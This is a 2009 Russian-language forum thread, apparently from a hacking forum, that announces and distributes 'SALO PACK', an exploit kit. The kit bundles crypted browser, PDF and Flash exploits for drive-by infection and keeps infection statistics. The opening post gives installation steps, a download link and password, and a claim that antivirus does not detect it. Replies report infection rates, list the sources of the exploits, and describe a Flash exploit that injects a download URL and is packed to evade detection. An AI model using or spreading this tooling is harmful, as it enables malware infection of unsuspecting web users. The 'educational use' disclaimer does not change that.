[SALO PACK] Alpha version

Discussion in 'PHP' started by Dimi4, 10 Jul 2009.

  1. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    не актуально :)


    [​IMG]
    SALO PACK © UASC
    by n0153r, Dimi4

    • Данный програмный продукт предназначен только для образовательных целей. Использование его в любом другом
      виде может быть расценено как нарушение закона!
    • Запрещена продажа и использование исходного кода SALO PACK в коммерческих целях
    Круто, да? :D

    Мультисистемная связка эксплойтов со статистикой. (Написана с нуля)
    • Крипт кода эксплойтов по технологии разработанной UASC. (n0153r)
    • Использование технологии Sajax
    • Детальная статистика по странам, пробиву, браузерам, операционным системам.
    • Подсчет пробива без необходимости использования ПО заходящего на URL статистики.
    • Абсолютно ничего не палится АВ

    На этот момент SALO PACK представляет собой набор из 6-х эксплойтов

    Пример статистики:
    [​IMG]
    Или:
    Кол-во посетителей 175
    Кол-во зараженных 49
    Общая пробиваемость 28%
    ІЕ зараженных 97.96%

    Установка
    • Отредактируйте файл cfg.php в соответствии с вашими данными.
    • В файле cfg.php строчку:
      Code:
      $config_adminPass=md5("xek"); 
      Замените на
      Code:
      $config_adminPass=ВАШ_ПАРОЛЬ_В_МД5
      
    • Загрузите все файлы из архива на сервер.
    • Установите права 777 на файл cfg.php.
    • Запустите скрипт sql.php.
    • Зайдите в админ-центр (/admin/), перейдите в меню "Настройки", и загрузите свой файл.

    Скриншуты

    Вход в админку:
    [​IMG]

    Пробитые ИП:
    [​IMG]

    Настройки:
    [​IMG]

    Скачать: (Пароль - _roa_salopack)
    http://uasc.org.ua/files/SALO_PACK_v_1.1.rar
    P.S. Если у кого есть желание поделится сплойтами, и поддержать проект - велкам ПМ. Особенно нужен флеш сплойт.
    2009 © UASC
     
    #1 Dimi4, 10 Jul 2009
    Last edited: 27 Feb 2010
    19 people like this.
  2. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    хек. держи +
    а так, неплохо было бы в описание добавить что за эксплоиты используются
     
  3. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Адепт .. а почему со сплойта идёт редирект на http://[xxx]/t/gate.php
     
    #3 slider, 10 Jul 2009
    Last edited: 10 Jul 2009
  4. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Это для теста погрузилось тебе ПО. Ничего опасного нет, отстук просто на гейт.
    Можете реверсить, проверять и тд.
     
    2 people like this.
  5. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    8 ишак пробивает?
     
  6. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
  7. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,224
    Reputations:
    455
    Сплоит под флеш - уже устарел (а более новых версия в руки не попадало както)
     
  8. sboy20042

    sboy20042 Banned

    Joined:
    7 Jul 2007
    Messages:
    318
    Likes Received:
    376
    Reputations:
    128
    отпиши плиз какие сплойты юзаются

    П.С. НАЗВАНИЕ ТРУ)))
     
    #8 sboy20042, 10 Jul 2009
    Last edited: 10 Jul 2009
    1 person likes this.
  9. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    PHP:
      mysql_query("drop database $config_dbName;");
      
    mysql_query("create database $config_dbName;");
    вотэто лучше убрать... или хотябы предуприждение написать

    А как определяеься заражон комп или нет?
    заходил через ие7 в стате пишеться что заражен, хотя на самом деле файл небыл запущен
     
    #9 nc.STRIEM, 10 Jul 2009
    Last edited: 10 Jul 2009
  10. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    Code:
    GET /SALO_PACK/i.php HTTP/1.1
    Host: localhost
    
    Code:
    <br />
    <b>Notice</b>:  Undefined index:  HTTP_USER_AGENT in <b>pew\pew\pew\SALO_PACK\f.php</b> on line <b>6</b><br />
    <br />
    f.php:
    Code:
    $nua = strToLower([color=red][b]@[/b][/color]$_SERVER['HTTP_USER_AGENT']);
    и везде подобавлять error_reporting(0);
     
    #10 eLWAux, 10 Jul 2009
    Last edited: 10 Jul 2009
  11. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Народ, сегодня уезжаю, поэтому может не успею ответить на все вопросы.

    2 nc.STRIEM Поправим.

    Определение пробива происходит следующим образом: код сплойта исполняется, в конце отправляется результат с помощью Sajax

    Все указанные погрешности постараюсь исправить как только будет возможность
     
  12. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    На счет списка сплойтов:
    Дело в том, что связка начала писатся около полгода назад, и названия сплойтов надо просто вспоминать, ведь щас они криптованые.
    Под Оперу:
    IE7 Sploit (DirectShow)
    Opera 9.62 [exploit] - https://forum.antichat.ru/printthread.php?t=57602&pp=40 полностю переделаный от n0153r
    Осел
    1 - http://unitedcrew.org/viewtopic.php?p=55556
    2 - http://eriz.pcinside.pl/weblog/gadu-padu-trojanik-64.html
    3 - https://forum.antichat.ru/printthread.php?t=43038&pp=40

    также прошу не забывать от том что совместным автором является n0153r
     
    #12 Dimi4, 10 Jul 2009
    Last edited: 10 Jul 2009
  13. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,224
    Reputations:
    455
    Вот Flash сплоит. Вроде как под 12 версий флеша.
    Когда то писал для своей связки.
    Алгоритм работы такой:
    Грузится файл flash.dat - неупакованная флешка - сигнатура FWS
    Затем в неё вбивается адрес для скачевания файла.
    И Потом пакуется всё это гзипом и добавляются заголовки для получения упакованной флешки (сигнатура CWS) - для беспаливности )
     
    #13 slesh, 11 Jul 2009
    Last edited by a moderator: 19 Feb 2010
    2 people like this.
  14. n0153r

    n0153r Elder - Старейшина

    Joined:
    19 Jun 2007
    Messages:
    260
    Likes Received:
    92
    Reputations:
    11
    Спасибо =) Сейчас розберусь и добавлю все.
    Жди в скором времени апдейт ...
     
    3 people like this.
  15. sboy20042

    sboy20042 Banned

    Joined:
    7 Jul 2007
    Messages:
    318
    Likes Received:
    376
    Reputations:
    128
    вообщем тестил я связку на 2 ботах, в обоих случаях ничего не остучало, 1 бота слили 100 лоадов по стате в 40% пробива) второго 20 лоадов и ничего не отстукало)
     
  16. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    у меня ни ИЕ7 ни Лису 2, ни оперу не пробило, хотя писало что пробив был.
    Кстати ИЕ любезно предложил запустить сплойт, я эту инициативу одобрил, однако он в ответ завис, так и не запустив мою заветную программулину. =(
     
  17. n0153r

    n0153r Elder - Старейшина

    Joined:
    19 Jun 2007
    Messages:
    260
    Likes Received:
    92
    Reputations:
    11
    Ну наконец дошли руки обновить связку.
    Посидели с Димкой и наколдовали обновления.
    Добавили сплоит под ПДФ и под ФФ 3.5
    Все что собрали до отпуска :)
    Может у кого нить есть что-то интересное - предлагайте.

    А вот и линк : http://uasc.org.ua/files/SALO_PACK_v_1.1.rar

    Жду критику :)
    P/S думаю до версии 2.0 все будет работать как часики .
    Делали с душой для все РОА.
    Спасибо за внимание.
     
    #17 n0153r, 15 Aug 2009
    Last edited: 16 Aug 2009
    6 people like this.
  18. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    404 по линку
     
  19. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    http://uasc.org.ua/files/SALO_PACK_v_1.1.rar
     
    3 people like this.
  20. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    Аналогинчно как и у sboy20042 и Twoster система отписала 100 загрузок, а в реале ничего не прогрузилось
     
    _________________________